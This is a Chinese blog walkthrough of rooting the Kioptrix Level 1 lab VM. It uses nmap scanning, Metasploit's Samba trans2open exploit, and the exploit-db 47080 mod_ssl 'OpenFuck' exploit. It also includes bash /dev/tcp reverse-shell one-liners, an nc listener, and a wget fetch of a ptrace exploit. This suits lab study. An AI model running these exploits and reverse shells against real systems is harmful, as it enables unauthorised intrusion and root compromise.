kioptrix-leva1靶场渗透测试

最新推荐文章于 2024-08-01 22:41:16 发布
最新推荐文章于 2024-08-01 22:41:16 发布
阅读量1k 收藏 27
点赞数 25
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/viki101/article/details/132946172
版权

一.第一种方法

将vmx文件中靶机地址网络改为nat模式,然后用VMware打开vmx文件。

  1. kali linux 命令 ifconfig 查看本机ip

root@kali:~# ip add   (ifconfig有时候不管用)

  1. nmap进行c段扫描 nmap -sP 192.168.122.128/24

  

  1. 目标ip192.168.122.133

列出端口并进行端口服务探测 nmap -sV -A -p- -v 192.168.122.133

  1. Nmap扫描发现139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP) 采用了samba服务 
  3. 利用msf

(1):搜索smb扫描辅助模块 search smb_version 

(2):利用该模块

msf5 > use auxiliary/scanner/smb/smb_version   

msf5 auxiliary(scanner/smb/smb_version) >

msf5 auxiliary(scanner/smb/smb_version) > set rhost 192.168.122.133   //设置被攻击目标ip                                                                                                                                         

rhost => 192.168.122.133

msf5 auxiliary(scanner/smb/smb_version) > set rport 139  //设置端口

rport => 139

msf5 auxiliary(scanner/smb/smb_version) > run    //运行

(3):发现smb版本 Samba 2.2.1a

(4):Back 命令退出模块

msf5 > search samba   //搜索samba漏洞利用模块

   

  1. :利用漏洞脚本11  msf5 > use exploit/linux/samba/trans2open
  2. (6):显示payload并设置

msf5 exploit(linux/samba/trans2open) > show payload

[-] Invalid parameter "payload", use "show -h" for more information

msf5 exploit(linux/samba/trans2open) > show payloads

找到对应payload

(7):利用239就可以

msf5 exploit(linux/samba/trans2open) > set payloadset payload linux/x86/shell_reverse_tcp

payload => linux/x86/shell_reverse_tcp

(8):设置目标ip以及端口

msf5 exploit(linux/samba/trans2open) > set rhost 192.168.122.133

rhost => 192.168.122.133

msf5 exploit(linux/samba/trans2open) > set rport 139

rport => 139

(9):执行命令 run或者exploit

(10):反弹shell

(11):监听2333 端口 nc lvvp 2333

bash -i >& /dev/tcp/192.168.122.128/2333 0>&1 ip为kali主机ip

反弹shell成功

二.第二种方法

1.mod_ssl 版本低,可以利用

(1):搜索漏洞 searchsploit  mod_ssl/2.8.4

(2):下载脚本 47080.c

root@kali:~# locate unix/remote/47080.c

/usr/share/exploitdb/exploits/unix/remote/47080.c

(3):将脚本复制到桌面

cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

(4):编译脚本

root@kali:~# gcc -o exploit 47080.c -lcrypto

47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录

   21 | #include <openssl/ssl.h>

      |          ^~~~~~~~~~~~~~~

(5):提示报错了,经过百度搜索,发现是缺少了组件,咱们使用apt进行安装

root@kali:~#apt-get install libssl1.0-dev

然后再进行编译

root@kali:~# gcc -o OpenFuck 47080.c -lcrypto

(6):  ./OpenFuck 查看OpenFuck 使用方法

发现对应脚本

经测试0x6b可用

使用命令 ./OpenFuck 0x6b 192.168.122.133 -c 40

(7):拿到权限,但不是root权限

(8):错误显示缺少 ptrace-kmod.c  脚本

下载脚本

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

(9):之后kali主机开启http.Sever服务

python -m  SimpleHTTPServer 8000   //由于kali是python2,所以用户这个命令

                                                                                                                      

(10):目标机器下载脚本

wget 192.168.122.128:8000/ptrace-kmod.c

(11):之后重新编译脚本

./OpenFuck 0x6b 192.168.122.133 -c 40

(12):拿到权限

反弹shell

目标机 bash -i >& /dev/tcp/192.168.122.128/2333 0>&1   

Kali主机  监听 nc -lvvp 2333

                                                                                          

 成功拿到root权限。                                       

viki101
关注
  • 25
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
leva::volcano:React-first组件GUI
03-11
import { useControls } from "leva" function MyComponent ( ) { const { name , aNumber } = useControls ( { name : "World" , aNumber : 0 } ) return < div> Hey { name } , hello! { aNumber } <
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 910
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
kioptrix1(mod_ssl版本漏洞提权)
m0_66299232的博客
10-25 835
1.这里也可以从github中下载相关项目!按照步骤走即可提权。2.查找mod_ssl相关漏洞,进行编译,即可提权成功。攻击机系统:kali linux 2021.1。2.下载完 进入Openluck目录,进行编译。5.运行,成功提权,轻松拿下!探测目标靶机开放端口和服务情况。虚拟机网络链接模式:桥接模式。4.找到对应版本,填写参数。
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 666
适用于零基础新人的通关攻略,其中包含涉及到知识点
Kioptrix: Level 1靶机实战 443 mod_ssl 2.8.4溢出漏洞 47080 getshell samba 2.2.1a 溢出漏洞get root权限 samba版本
YouthBelief的博客
11-15 2832
Kioptrix: Level 1靶机实战前言信息收集探测靶机ipnmap探测端口访问首页枚举目录443端口入手searchsploit搜索漏洞拷贝漏洞编译expexp利用139端口入手探测版本(msf探测成功)smbclientenum4linuxmsf寻找漏洞(1) searchsploit 搜索(2) 谷歌搜索msf攻击总结 前言 Kioptrix: Level 1 (#1): 靶机地址 https://www.vulnhub.com/entry/kioptrix-level-1-1 下载解压好后
linux的smb漏洞利用,Samba trans2open Overflow (Linux x86) - 婕忔礊鍒╃敤 - 0day,Exploit,Shellcode...
weixin_42160398的博客
05-24 415
### $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# ...
vulnhub-Kioptrix Level 1 (考点:mod_ssl / smb139/smb版本探测)不用msf
冬萍子癸水
04-19 644
C:\root\Desktop> nikto -h http://192.168.189.163 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.189.163 + Target Hostname: ...
breaking-bad-design-concept:由Ansh Deb设计并由Matic Leva开发的Breaking Bad网站设计概念
05-12
打破坏的设计理念由Ansh Deb设计并由Matic Leva开发的Breaking Bad网站设计概念。 原始设计可以在。
hello-world-with-react-gui
05-16
hexagonal.js你好世界示例 这是最简单的hexagonaljs应用程序。 它显示了hexagonaljs体系结构的所有基本概念。 怎么运行呢? 只需克隆存储库并打开index.... 怎么做呢? $ npm安装 ... glue = new Glue (useCase, gui)
HashCool-crx插件
03-22
通过API的HashCool leva osbenefíciosda区块链,可扩展性和可扩展性 Com ele,qualquerusuárioou ... 通过API的HashCool leva osbenefíciosda区块链,可扩展性和可扩展性。 Coméele,qualquerusuárioou empresa...
teste-frontend-smpd
03-19
一个使用“ cadria conta”创建的posauitambémumbotão,在cadastro上使用leva ousuáriopara。 Páginade登录界面环境,用于“登录”和“密码”以及对等的登录,以及对用户界面的使用。帕斯吉娜·德·布斯卡·德...
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 504
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
未知攻焉知防:从攻击者视角看网络安全的“攻守之道”
科技云报道
08-01 240
基于独特的“动态安全+AI”技术思想,瑞数信息综合运用自动化攻击保护、0day防护、多源低频防护、多维度分层分级对抗等多种安全防护策略和手段,还推出瑞数WAAP超融合平台,支持WAF、Bots防护、0day攻击防护、应用DDoS防护、API安全防护等多项安全产品单独或联合部署,能够覆盖Web、移动App、H5、API及IoT全应用渠道,提供多层级的联动防御机制,令企业在各类复杂的环境中,都可以轻松实现应用安全一体化防御。其次,由于供应链数量众多,类型错综复杂,导致安全难以做到统一管理,供应链风险与日俱增。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 610
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
保护国外使用代理IP的安全方法
iphttp的博客
07-30 381
用户在国外使用代理IP时,应该时刻保持警惕,不要随意点击可疑链接,养成良好的网络安全意识。此外,用户还应该避免在代理服务器上输入敏感信息,如银行账号、密码等。使用代理IP时,用户应该尽量使用加密协议(如SSL、TLS)来保护数据传输的安全。这将确保用户的个人信息和访问记录不会被黑客窃取或监控。在选择代理服务器时,用户应该选择那些经过验证和信任的服务器,如知名的VPN服务提供商。用户应该定期更新操作系统和软件,以确保其安全性。这样可以有效地防止黑客通过代理服务器攻击用户的计算机或移动设备。
使用 WebSocket 实现实时聊天
weixin_44976692的博客
07-28 900
在现代网络应用中,实时聊天功能已经成为用户体验的重要组成部分。无论是社交媒体平台、在线客服系统还是多人在线游戏,实时聊天功能都为用户提供了即时沟通的便利。实现实时聊天的技术有很多种,其中 WebSocket 是最受欢迎和高效的解决方案之一。本文将介绍如何使用 WebSocket 实现一个简单的实时聊天应用,包括 WebSocket 的基本概念、服务端和客户端的实现、以及一些可能的优化和扩展。WebSocket 是一种在单个 TCP 连接上进行全双工、双向交互的协议。
TCP和UDP协议的区别以及原理
2301_78276982的博客
07-30 811
该文章是看了很多的网上的博主写的关于TCP和UDP做的总结,我呢也想着关于自己的想法,带大家重新认知了一下TCP和UDP的原理以及区别,做一个简单的梳理和总结,希望能给予你们一些启发。
Spark Steaming有状态转换实验
最新发布
m0_59508634的博客
08-01 547
打开一个新的shell窗口,切换到logfile目录下,创建一个log.txt文档保存,再创建一个log_new.txt文档保存,里面输入一些随意的单词,并用空格间隔开。注:log.txt输入为“a b c a b c d”,log_new.txt输入为“a b d e f a b e f”。在服务端输入以下字符串,并按回车,可以在客户端收到消息,并打印出来。在客户端输入字符串,并按回车,可以在服务端收到消息,并打印出来。的回滚来查看结果,因为回滚较快,所以在运行状态下查看结果截图较困难。
uniapp使用WebSocket uniapp使用WebSocket Uniapp整合WebSocket uniapp使用 websocket
半只
07-29 214
代码中的示例只在 H5、APP环境下成功运行,小程序环境下如果无效,需要使用预编译 - 条件性的编译,适配 小程序环境#ifdef H5:针对 Web H5页面。:针对原生应用(Android 和 iOS)。:针对微信小程序。:针对支付宝小程序。:针对百度小程序。:针对字节跳动小程序。:针对 QQ 小程序。:针对快手小程序。:针对京东小程序。
LABVIEW STM32
07-28
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

viki101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值